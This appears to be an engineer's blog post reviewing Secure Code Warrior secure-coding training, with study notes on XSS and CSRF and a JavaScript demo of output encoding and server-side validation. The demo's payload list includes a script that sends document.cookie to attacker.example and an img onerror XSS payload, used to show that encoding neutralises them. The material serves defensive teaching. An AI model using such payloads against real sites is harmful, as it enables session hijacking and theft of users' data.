You are the Secure Code Warrior

OpenTable has given its engineers access to a tool called Secure Code Warrior to practice and learn secure coding best practices.
There are modules for different tech stacks. I'm taking the React.js module.
Secure Code Warrior has a pretty cool interface. It presents scenarios as games: attackers from all over the world are attacking your systems and you have to save the day. Gamification. I like it.
You are tasked with fixing code that has one or more security holes. Below is a snapshot of the interface. Pretty cool. All that's missing is the DEFCON countdown audio.


Some of the training questions and examples make it unclear what is actually being asked. I'd appreciate a (better) introduction to each security vulnerability first, before jumping straight into the coding tests.

Others and I ended up repeating the same section because the tool's UX is confusing. When a section is done, don't hit "Continue"; that means keep doing the same section. Instead, pay attention to the correct button to press to end that section and move on to a new one.

And some of the React.js code is just not how React.js is typically written. It mixes different ways of updating the DOM: raw browser APIs and jQuery as well as JSX. Plus a lot of use of dangerouslySetInnerHTML. I think we've only used that once in years.
I heard from people who took the Java course that it has similarly outdated, odd-looking code.

BUT it is useful and raises awareness. I'd like to use the tool more, on a regular basis.


Useful References and notes
Use this: https://www.npmjs.com/package/sanitize-html
https://owasp.org/www-community/attacks/xss/
https://portswigger.net/web-security/csrf
https://owasp.org/www-project-cheat-sheets/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet
https://owasp.org/www-project-cheat-sheets/cheatsheets/Session_Management_Cheat_Sheet
https://blog.rapid7.com/2017/06/15/about-user-enumeration/
https://owasp.org/www-project-cheat-sheets/cheatsheets/AJAX_Security_Cheat_Sheet


Cross-site scripting (XSS) is a type of injection attack in which malicious script is injected into an otherwise trusted site. The attacker uses the site to deliver the script to another user, whose browser runs it with that site's privileges; the script can then steal data such as session cookies or redirect the user to another site.
Countermeasures: validate input, and encode output for the context it is rendered in (HTML body, attribute, JavaScript, URL) before displaying it. The aim is to stop script getting in and, failing that, to stop anything that did get in from being interpreted as code. In React, JSX expressions like {userText} are encoded automatically; dangerouslySetInnerHTML bypasses that, so anything passed to it must be sanitized first (e.g. with sanitize-html).
Often forgotten: the first true line of defense is the API used by the frontend. It's not enough to check in the browser; you also have to validate and sanitize at the API, because attackers can easily bypass the UI and hit the API directly.
Persistent (stored) XSS is a variation in which the malicious code is saved on the server and then served to every user who views the affected page, rather than only to whoever follows a crafted link.
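The two halves of the XSS defense described above, as an added example that is not Secure Code Warrior's code or the post's own: an HTML output encoder used at render time (the vulnerable string-interpolating renderer beside its encoded form), plus the same input rules enforced at the API, where an attacker who skipped the UI would land. The comment endpoint, its length rule, and the payloads are all made up for the demonstration.

```javascript
// Added example (not Secure Code Warrior's or the post's own code): output encoding
// as the XSS countermeasure, and validation repeated at the API, where the attacker
// cannot be assumed to have gone through the UI. Names, rules and payloads are made up.

// Characters that can change HTML structure in text and attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode for the HTML text/attribute context. This is what React does for {expr} in JSX.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: interpolates untrusted input straight into markup. Equivalent to
// dangerouslySetInnerHTML={{ __html: comment }} with an unsanitized string.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Fixed: encode before displaying, so tags and event handlers arrive as inert text.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Server-side validation for a hypothetical POST /comments. The UI may enforce the
// same rules, but the API must re-check because the attacker can call it directly.
function validateCommentInput(body) {
  if (typeof body !== 'object' || body === null) return { ok: false, error: 'body must be a JSON object' };
  const { comment } = body;
  if (typeof comment !== 'string') return { ok: false, error: 'comment must be a string' };
  if (comment.length === 0 || comment.length > 500) return { ok: false, error: 'comment must be 1-500 characters' };
  // Reject control characters (tab, newline and CR stay allowed). Do NOT try to strip
  // "<script>" here: store the text verbatim and rely on output encoding at render time.
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F]/.test(comment)) return { ok: false, error: 'control characters not allowed' };
  return { ok: true, value: comment };
}

// Demo-only detector: does the markup contain a <script> tag or an inline event
// handler attribute inside a tag? Encoded output has no '<' at all, so it never matches.
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed payloads of the kind the SCW exercises throw at you, plus a benign one.
const PAYLOADS = [
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
  '<img src=x onerror="alert(document.domain)">',
  'Great restaurant, 5 stars!',
];

// Run each payload through both renderers and report whether live script survives.
function demo() {
  return PAYLOADS.map((p) => ({
    input: p,
    unsafeActive: containsActiveContent(renderCommentUnsafe(p)),
    safeActive: containsActiveContent(renderCommentSafe(p)),
  }));
}

console.table(demo());
```

The validator deliberately does not try to filter out "dangerous" strings: a denylist is easy to bypass and the stored text may legitimately contain angle brackets. The contract is "store what was sent, within sane limits; encode for the context when rendering", which is what JSX does for you unless you opt out with dangerouslySetInnerHTML.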

Cross-Site Request Forgery (CSRF) is an attack where a user is induced to perform an action they did not intend to perform, typically because a page the attacker controls makes the victim's browser send a request to the target site.
For the attack to succeed, three elements must be in place:

  1. cookie-based session handling with no other mechanism: the browser attaches the session cookie automatically, so the cookie alone identifies the user
  2. no unpredictable or random element in the request that the attacker could not know in advance
  3. an important action, such as a privileged action, e.g. changing the user's email

The most common countermeasure is to introduce a random element which cannot be known to the attacker. A CSRF token tied to the user's session is the recommended and commonly used approach; the server must actually verify it (with a constant-time comparison), not just check that it is present. Asking for the current password in order to change it is another example, and requiring re-authentication for sensitive actions is also used. Setting the session cookie's SameSite attribute (Lax or Strict) is a useful extra layer, but not a replacement for the token.
